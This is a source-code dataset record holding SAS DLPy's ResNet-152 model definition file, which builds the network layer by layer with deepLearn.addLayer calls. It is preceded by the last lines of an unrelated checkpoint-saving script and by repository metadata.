save_model(featureNet, 'saved_models_ce/featureNet_{}.pth'.format(epoch))
save_model(maskNet, 'saved_models_ce/maskNet_{}.pth'.format(epoch))
save_model(fcNet, 'saved_models_ce/fcNet_{}.pth'.format(epoch))
print('finish: time={}\n'.format(dt()))
| 38.497976 | 140 | 0.66211 |
acdfa78bafb49f868d8922f526e0872e5f0da250 | 120,006 | py | Python | dlpy/caffe_models/model_resnet152.py | arharvey918/python-dlpy | 423985ebe65acbcbe9a7996bb26aee5e66eddc49 | [
"Apache-2.0"
] | 1 | 2018-08-27T15:10:11.000Z | 2018-08-27T15:10:11.000Z | dlpy/caffe_models/model_resnet152.py | arharvey918/python-dlpy | 423985ebe65acbcbe9a7996bb26aee5e66eddc49 | [
"Apache-2.0"
] | null | null | null | dlpy/caffe_models/model_resnet152.py | arharvey918/python-dlpy | 423985ebe65acbcbe9a7996bb26aee5e66eddc49 | [
"Apache-2.0"
] | 1 | 2019-09-19T15:59:26.000Z | 2019-09-19T15:59:26.000Z | #!/usr/bin/env python
# encoding: utf-8
#
# Copyright SAS Institute
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from ..utils import input_table_check
def ResNet152_Model(s, model_table='RESNET152', n_channels=3, width=224, height=224,
random_crop=None, offsets=None,
random_flip=None, random_mutation=None,
reshape_after_input=None):
'''
ResNet152 model definition
Parameters
----------
s : CAS
Specifies the CAS connection object
model_table : string, dict or CAS table, optional
Specifies the CAS table to store the model.
n_channels : int, optional
Specifies the number of the channels of the input layer
Default: 3
width : int, optional
Specifies the width of the input layer
Default: 224
height : int, optional
Specifies the height of the input layer
Default: 224
random_crop : string, optional
Specifies how to crop the data in the input layer when image data is
used. Images are cropped to the values that are specified in the width
and height parameters.deepLearn. Only the images with one or both dimensions
that are larger than those sizes are cropped.
Valid Values: 'none', 'unique', 'randomresized', 'resizethencrop'
offsets : double or iter-of-doubles, optional
Specifies an offset for each channel in the input data. The final
input data is set after applying scaling and subtracting the
specified offsets.deepLearn.
Default: (103.939, 116.779, 123.68)
random_flip : string, optional
Specifies how to flip the data in the input layer when image data is
used. Approximately half of the input data is subject to flipping.
Valid Values: 'h', 'hv', 'v', 'none'
random_mutation : string, optional
Specifies how to apply data augmentations/mutations to the data in the input layer.
Valid Values: 'none', 'random'
reshape_after_input : Layer Reshape, optional
Specifies whether to add a reshape layer after the input layer.
Returns
-------
None
A CAS table defining the model is created
'''
model_table_opts = input_table_check(model_table)
# quick error-checking and default setting
if offsets is None:
offsets = [103.939, 116.779, 123.68]
# instantiate model
s.deepLearn.buildModel(model=dict(replace=True, **model_table_opts), type='CNN')
# input layer
s.deepLearn.addLayer(model=model_table_opts, name='data',
layer=dict(type='input', nchannels=n_channels, width=width, height=height,
randomcrop=random_crop, offsets=offsets,
randomFlip=random_flip, randomMutation=random_mutation))
input_data_layer = 'data'
if reshape_after_input is not None:
input_data_layer = 'reshape1'
s.deepLearn.addLayer(model=model_table_opts, name='reshape1',
layer=dict(type='reshape', **reshape_after_input.config),
srcLayers=['data'])
# -------------------- Layer 1 ----------------------
# conv1 layer: 64 channels, 7x7 conv, stride=2; output = 112 x 112 */
s.deepLearn.addLayer(model=model_table_opts, name='conv1',
layer=dict(type='convolution', nFilters=64, width=7, height=7,
stride=2, act='identity'),
srcLayers=[input_data_layer])
# conv1 batch norm layer: 64 channels, output = 112 x 112 */
s.deepLearn.addLayer(model=model_table_opts, name='bn_conv1',
layer=dict(type='batchnorm', act='relu'), srcLayers=['conv1'])
# pool1 layer: 64 channels, 3x3 pooling, output = 56 x 56 */
s.deepLearn.addLayer(model=model_table_opts, name='pool1',
layer=dict(type='pooling', width=3, height=3, stride=2, pool='max'),
srcLayers=['bn_conv1'])
# ------------------- Residual Layer 2A -----------------------
# res2a_branch1 layer: 256 channels, 1x1 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2a_branch1',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['pool1'])
# res2a_branch1 batch norm layer: 256 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2a_branch1',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res2a_branch1'])
# res2a_branch2a layer: 64 channels, 1x1 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2a_branch2a',
layer=dict(type='convolution', nFilters=64, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['pool1'])
# res2a_branch2a batch norm layer: 64 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2a_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res2a_branch2a'])
# res2a_branch2b layer: 64 channels, 3x3 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2a_branch2b',
layer=dict(type='convolution', nFilters=64, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn2a_branch2a'])
# res2a_branch2b batch norm layer: 64 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2a_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res2a_branch2b'])
# res2a_branch2c layer: 256 channels, 1x1 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2a_branch2c',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn2a_branch2b'])
# res2a_branch2c batch norm layer: 256 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2a_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res2a_branch2c'])
# res2a residual layer: 256 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2a',
layer=dict(type='residual', act='relu'),
srcLayers=['bn2a_branch2c', 'bn2a_branch1'])
# ------------------- Residual Layer 2B -----------------------
# res2b_branch2a layer: 64 channels, 1x1 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2b_branch2a',
layer=dict(type='convolution', nFilters=64, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res2a'])
# res2b_branch2a batch norm layer: 64 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2b_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res2b_branch2a'])
# res2b_branch2b layer: 64 channels, 3x3 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2b_branch2b',
layer=dict(type='convolution', nFilters=64, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn2b_branch2a'])
# res2b_branch2b batch norm layer: 64 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2b_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res2b_branch2b'])
# res2b_branch2c layer: 256 channels, 1x1 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2b_branch2c',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn2b_branch2b'])
# res2b_branch2c batch norm layer: 256 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2b_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res2b_branch2c'])
# res2b residual layer: 256 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2b',
layer=dict(type='residual', act='relu'),
srcLayers=['bn2b_branch2c', 'res2a'])
# ------------------- Residual Layer 2C -----------------------
# res2c_branch2a layer: 64 channels, 1x1 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2c_branch2a',
layer=dict(type='convolution', nFilters=64, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res2b'])
# res2c_branch2a batch norm layer: 64 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2c_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res2c_branch2a'])
# res2c_branch2b layer: 64 channels, 3x3 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2c_branch2b',
layer=dict(type='convolution', nFilters=64, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn2c_branch2a'])
# res2c_branch2b batch norm layer: 64 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2c_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res2c_branch2b'])
# res2c_branch2c layer: 256 channels, 1x1 conv, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2c_branch2c',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn2c_branch2b'])
# res2c_branch2c batch norm layer: 256 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='bn2c_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res2c_branch2c'])
# res2c residual layer: 256 channels, output = 56 x 56
s.deepLearn.addLayer(model=model_table_opts, name='res2c',
layer=dict(type='residual', act='relu'),
srcLayers=['bn2c_branch2c', 'res2b'])
# ------------- Layer 3A --------------------
# res3a_branch1 layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3a_branch1',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=2, includebias=False, act='identity'),
srcLayers=['res2c'])
# res3a_branch1 batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3a_branch1',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3a_branch1'])
# res3a_branch2a layer: 128 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3a_branch2a',
layer=dict(type='convolution', nFilters=128, width=1, height=1,
stride=2, includebias=False, act='identity'),
srcLayers=['res2c'])
# res3a_branch2a batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3a_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3a_branch2a'])
# res3a_branch2b layer: 128 channels, 3x3 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3a_branch2b',
layer=dict(type='convolution', nFilters=128, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3a_branch2a'])
# res3a_branch2b batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3a_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3a_branch2b'])
# res3a_branch2c layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3a_branch2c',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3a_branch2b'])
# res3a_branch2c batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3a_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3a_branch2c'])
# res3a residual layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3a',
layer=dict(type='residual', act='relu'),
srcLayers=['bn3a_branch2c', 'bn3a_branch1'])
# ------------------- Residual Layer 3B1 -----------------------
# res3b1_branch2a layer: 128 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b1_branch2a',
layer=dict(type='convolution', nFilters=128, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res3a'])
# res3b1_branch2a batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b1_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b1_branch2a'])
# res3b1_branch2b layer: 128 channels, 3x3 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b1_branch2b',
layer=dict(type='convolution', nFilters=128, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b1_branch2a'])
# res3b1_branch2b batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b1_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b1_branch2b'])
# res3b1_branch2c layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b1_branch2c',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b1_branch2b'])
# res3b1_branch2c batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b1_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3b1_branch2c'])
# res3b1 residual layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b1',
layer=dict(type='residual', act='relu'),
srcLayers=['bn3b1_branch2c', 'res3a'])
# ------------------- Residual Layer 3B2 -----------------------
# res3b2_branch2a layer: 128 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b2_branch2a',
layer=dict(type='convolution', nFilters=128, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res3b1'])
# res3b2_branch2a batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b2_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b2_branch2a'])
# res3b2_branch2b layer: 128 channels, 3x3 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b2_branch2b',
layer=dict(type='convolution', nFilters=128, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b2_branch2a'])
# res3b2_branch2b batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b2_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b2_branch2b'])
# res3b2_branch2c layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b2_branch2c',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b2_branch2b'])
# res3b2_branch2c batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b2_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3b2_branch2c'])
# res3b2 residual layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b2',
layer=dict(type='residual', act='relu'),
srcLayers=['bn3b2_branch2c', 'res3b1'])
# ------------------- Residual Layer 3B3 -----------------------
# res3b3_branch2a layer: 128 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b3_branch2a',
layer=dict(type='convolution', nFilters=128, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res3b2'])
# res3b3_branch2a batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b3_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b3_branch2a'])
# res3b3_branch2b layer: 128 channels, 3x3 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b3_branch2b',
layer=dict(type='convolution', nFilters=128, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b3_branch2a'])
# res3b3_branch2b batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b3_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b3_branch2b'])
# res3b3_branch2c layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b3_branch2c',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b3_branch2b'])
# res3b3_branch2c batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b3_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3b3_branch2c'])
# res3b3 residual layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b3',
layer=dict(type='residual', act='relu'),
srcLayers=['bn3b3_branch2c', 'res3b2'])
# ------------------- Residual Layer 3B4 -----------------------
# res3b4_branch2a layer: 128 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b4_branch2a',
layer=dict(type='convolution', nFilters=128, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res3b3'])
# res3b4_branch2a batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b4_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b4_branch2a'])
# res3b4_branch2b layer: 128 channels, 3x3 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b4_branch2b',
layer=dict(type='convolution', nFilters=128, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b4_branch2a'])
# res3b4_branch2b batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b4_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b4_branch2b'])
# res3b4_branch2c layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b4_branch2c',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b4_branch2b'])
# res3b4_branch2c batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b4_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3b4_branch2c'])
# res3b4 residual layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b4',
layer=dict(type='residual', act='relu'),
srcLayers=['bn3b4_branch2c', 'res3b3'])
# ------------------- Residual Layer 3B5 -----------------------
# res3b5_branch2a layer: 128 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b5_branch2a',
layer=dict(type='convolution', nFilters=128, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res3b4'])
# res3b5_branch2a batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b5_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b5_branch2a'])
# res3b5_branch2b layer: 128 channels, 3x3 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b5_branch2b',
layer=dict(type='convolution', nFilters=128, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b5_branch2a'])
# res3b5_branch2b batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b5_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b5_branch2b'])
# res3b5_branch2c layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b5_branch2c',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b5_branch2b'])
# res3b5_branch2c batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b5_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3b5_branch2c'])
# res3b5 residual layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b5',
layer=dict(type='residual', act='relu'),
srcLayers=['bn3b5_branch2c', 'res3b4'])
# ------------------- Residual Layer 3B6 -----------------------
# res3b6_branch2a layer: 128 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b6_branch2a',
layer=dict(type='convolution', nFilters=128, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res3b5'])
# res3b6_branch2a batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b6_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b6_branch2a'])
# res3b6_branch2b layer: 128 channels, 3x3 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b6_branch2b',
layer=dict(type='convolution', nFilters=128, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b6_branch2a'])
# res3b6_branch2b batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b6_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b6_branch2b'])
# res3b6_branch2c layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b6_branch2c',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b6_branch2b'])
# res3b6_branch2c batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b6_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3b6_branch2c'])
# res3b6 residual layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b6',
layer=dict(type='residual', act='relu'),
srcLayers=['bn3b6_branch2c', 'res3b5'])
# ------------------- Residual Layer 3B7 -----------------------
# res3b7_branch2a layer: 128 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b7_branch2a',
layer=dict(type='convolution', nFilters=128, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res3b6'])
# res3b7_branch2a batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b7_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b7_branch2a'])
# res3b7_branch2b layer: 128 channels, 3x3 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b7_branch2b',
layer=dict(type='convolution', nFilters=128, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b7_branch2a'])
# res3b7_branch2b batch norm layer: 128 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b7_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res3b7_branch2b'])
# res3b7_branch2c layer: 512 channels, 1x1 conv, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b7_branch2c',
layer=dict(type='convolution', nFilters=512, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn3b7_branch2b'])
# res3b7_branch2c batch norm layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='bn3b7_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res3b7_branch2c'])
# res3b7 residual layer: 512 channels, output = 28 x 28
s.deepLearn.addLayer(model=model_table_opts, name='res3b7',
layer=dict(type='residual', act='relu'),
srcLayers=['bn3b7_branch2c', 'res3b6'])
# ------------- Layer 4A --------------------
# res4a_branch1 layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4a_branch1',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=2, includebias=False, act='identity'),
srcLayers=['res3b7'])
# res4a_branch1 batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4a_branch1',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4a_branch1'])
# res4a_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4a_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=2, includebias=False, act='identity'),
srcLayers=['res3b7'])
# res4a_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4a_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4a_branch2a'])
# res4a_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4a_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4a_branch2a'])
# res4a_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4a_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4a_branch2b'])
# res4a_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4a_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4a_branch2b'])
# res4a_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4a_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4a_branch2c'])
# res4a residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4a',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4a_branch2c', 'bn4a_branch1'])
# ------------------- Residual Layer 4B1 -----------------------
# res4b1_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b1_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4a'])
# res4b1_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b1_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b1_branch2a'])
# res4b1_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b1_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b1_branch2a'])
# res4b1_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b1_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b1_branch2b'])
# res4b1_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b1_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b1_branch2b'])
# res4b1_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b1_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b1_branch2c'])
# res4b1 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b1',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b1_branch2c', 'res4a'])
# ------------------- Residual Layer 4B2 -----------------------
# res4b2_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b2_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b1'])
# res4b2_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b2_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b2_branch2a'])
# res4b2_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b2_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b2_branch2a'])
# res4b2_branch2b batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b2_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b2_branch2b'])
# res4b2_branch2c layer: 1024 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b2_branch2c',
layer=dict(type='convolution', nFilters=1024, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b2_branch2b'])
# res4b2_branch2c batch norm layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b2_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res4b2_branch2c'])
# res4b2 residual layer: 1024 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b2',
layer=dict(type='residual', act='relu'),
srcLayers=['bn4b2_branch2c', 'res4b1'])
# ------------------- Residual Layer 4B3 -----------------------
# res4b3_branch2a layer: 256 channels, 1x1 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b3_branch2a',
layer=dict(type='convolution', nFilters=256, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['res4b2'])
# res4b3_branch2a batch norm layer: 256 channels, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='bn4b3_branch2a',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res4b3_branch2a'])
# res4b3_branch2b layer: 256 channels, 3x3 conv, output = 14 x 14
s.deepLearn.addLayer(model=model_table_opts, name='res4b3_branch2b',
layer=dict(type='convolution', nFilters=256, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn4b3_branch2a'])
# res4b3_branch2b batch norm layer: 256 channels, output = 14 x 14
